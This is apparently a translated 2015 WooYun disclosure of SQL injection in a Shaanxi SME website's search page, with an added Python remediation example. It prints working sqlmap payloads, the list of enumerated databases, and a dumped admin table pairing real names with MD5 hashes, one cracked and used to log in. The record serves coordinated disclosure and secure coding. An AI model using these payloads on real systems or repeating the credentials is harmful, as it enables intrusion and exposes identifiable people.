Vulnerability summary

Defect ID: wooyun-2015-0147627

Title: SQL injection in China SME Shaanxi Net (中国中小企业陕西网) dumps the database; backend admin accounts exposed

Vendor: China SME Shaanxi Net (中国中小企业陕西网)

Author: 编程浪子

Submitted: 2015-10-19 21:17

Fixed: 2015-12-07 11:32

Published: 2015-12-07 11:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Vulnerability details

Disclosure status:

2015-10-19: details sent to the vendor, awaiting vendor handling
2015-10-23: vendor confirmed; details disclosed to the vendor only
2015-11-02: details disclosed to core white hats and experts in the relevant field
2015-11-12: details disclosed to regular white hats
2015-11-22: details disclosed to intern white hats
2015-12-07: details disclosed to the public

Brief description:

SQL injection in China SME Shaanxi Net leads to disclosure of the database.

Detailed description:

Injection point:
**.**.**.**/search.php?flag=sme (POST)
stype=Ubusiness&keyword=155&x=35&y=7

---
Parameter: keyword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: stype=Ubusiness&keyword=155%' AND 9224=9224#&x=35&y=7
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: stype=Ubusiness&keyword=155%' AND (SELECT 9799 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(9799=9799,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&x=35&y=7
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: stype=Ubusiness&keyword=155%' OR SLEEP(5) AND '%'='&x=35&y=7
Type: UNION query
Title: MySQL UNION query (NULL) - 54 columns
Payload: stype=Ubusiness&keyword=155%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a627671,0x6a6d7a5870696c656e65,0x7171626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&x=35&y=7
---

Proof of vulnerability:

web server operating system: Windows
web application technology: ASP.NET, PHP 5.4.41
back-end DBMS: MySQL 5.0
available databases [11]:
[*] #mysql50#smecms-utf8
[*] destoon
[*] ecmmall
[*] information_schema
[*] mysql
[*] performance_schema
[*] sme315
[*] sme_xmsb
[*] smecms
[*] ultrax
[*] webunion


web server operating system: Windows
web application technology: ASP.NET, PHP 5.4.41
back-end DBMS: MySQL 5.0
Database: sme315
Table: admin
[3 entries]
+-----+-------+-------------------------------------------+--------------+
| Uid | Uname | Upassword | Uusername |
+-----+-------+-------------------------------------------+--------------+
| 20 | 申慧荣 | e10adc3949ba59abbe56e057f20f883e (123456) | guanli |
| 30 | 郭杰 | 79c87bd8a2abb8cb23b275afc22ecd35 | guojie |
| 29 | 乔洪英 | 9e8dd1adb0524a890caacd0878165410 | qiaohongying |
+-----+-------+-------------------------------------------+--------------+


Site backend URL: http://**.**.**.**/
The weak password guanli / 123456 logs in.

[Screenshot: 1.JPG]


The backend also has this function:

[Screenshot: 2.JPG]


I did not go any further.

Fix recommendations:

Filter user input,
raise security awareness and do not use weak passwords,
manage database privileges.
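The three fix items above, worked through in code. This is an added example and not code from the report or from the affected site; the table name `companies`, its rows and the hash format are constructed assumptions for the demo. The `keyword` parameter is handled the way sqlmap's output implies it was not: bound as a query parameter with LIKE wildcards escaped, so neither a quote nor a `%` in the input can change the query. The admin password storage replaces the unsalted MD5 seen in the dumped `admin` table with salted PBKDF2, and the privilege point is shown as a comment, since it is a MySQL GRANT the demo cannot run against SQLite.

```python
"""Added example (not part of the original WooYun report): the search
endpoint and admin credentials hardened as the fix section recommends.
Table/column names and sample rows are constructed for this demo."""
import hashlib
import hmac
import os
import sqlite3

# --- 1. filter user input: bind the keyword instead of splicing it in -----

def build_vulnerable_sql(keyword: str) -> str:
    """The pattern sqlmap's findings imply: the keyword is concatenated into a
    LIKE literal, so a quote in the input ends the string and the rest is SQL.
    Shown for contrast only; it is never executed here."""
    return "SELECT name FROM companies WHERE name LIKE '%" + keyword + "%'"

def escape_like(keyword: str) -> str:
    """Escape LIKE wildcards so the user's text is matched literally."""
    return (keyword.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))

def search_companies(conn: sqlite3.Connection, keyword: str) -> list:
    """Hardened search: the keyword travels as a bound parameter, so the
    database engine never parses it as SQL; ESCAPE makes '\\' the escape
    character for the wildcards escaped above."""
    pattern = "%" + escape_like(keyword) + "%"
    rows = conn.execute(
        "SELECT name FROM companies WHERE name LIKE ? ESCAPE '\\'", (pattern,)
    ).fetchall()
    return [r[0] for r in rows]

# --- 2. no weak passwords, no unsalted MD5 --------------------------------

def is_weak_password(password: str, minimum: int = 12) -> bool:
    """Minimal policy: reject short, all-digit or all-letter passwords such
    as the '123456' found in the admin table."""
    return len(password) < minimum or password.isdigit() or password.isalpha()

def hash_password(password: str, salt: bytes = None) -> str:
    """Salted PBKDF2-HMAC-SHA256; the stored string carries its own parameters.
    The 'algo$iters$salt$hash' layout is a constructed format for this demo."""
    salt = salt or os.urandom(16)
    iterations = 200_000
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

# --- 3. database privilege management -------------------------------------
# The account the search page connects with should only be able to SELECT the
# tables the search needs, so an injection in search.php cannot read the admin
# table or the other ten databases sqlmap enumerated.  In MySQL this is a
# GRANT such as (constructed example, database/user names are placeholders):
#   GRANT SELECT ON smecms.companies TO 'web_search'@'localhost';

def demo_connection() -> sqlite3.Connection:
    """In-memory table with constructed sample rows, including a quote and a
    literal '%' so the escaping and binding are exercised."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE companies (name TEXT)")
    conn.executemany("INSERT INTO companies VALUES (?)", [
        ("Shaanxi 155 Trading",),
        ("Xi'an Foods",),
        ("100% Cotton Co",),
    ])
    return conn

if __name__ == "__main__":
    conn = demo_connection()
    print(search_companies(conn, "155"))
    print(search_companies(conn, "155%' AND 9224=9224#"))  # the page's payload, now inert
    print(build_vulnerable_sql("155%' AND 9224=9224#"))    # what the old query became
    stored = hash_password("correct horse battery staple")
    print(verify_password("correct horse battery staple", stored),
          is_weak_password("123456"))
```

Run stand-alone, the hardened search returns only rows that literally contain the submitted text, so the report's boolean-blind payload matches nothing instead of turning the WHERE clause into a tautology, and a `%` typed by a user is searched for rather than treated as a wildcard.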

Copyright notice: when reposting, credit the source 编程浪子@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-23 11:31

Vendor reply:

CNVD confirmed and reproduced the described issue; it has been passed via CNCERT to the Shaanxi branch, which will coordinate handling with the organisation that manages the site.

Latest status:

None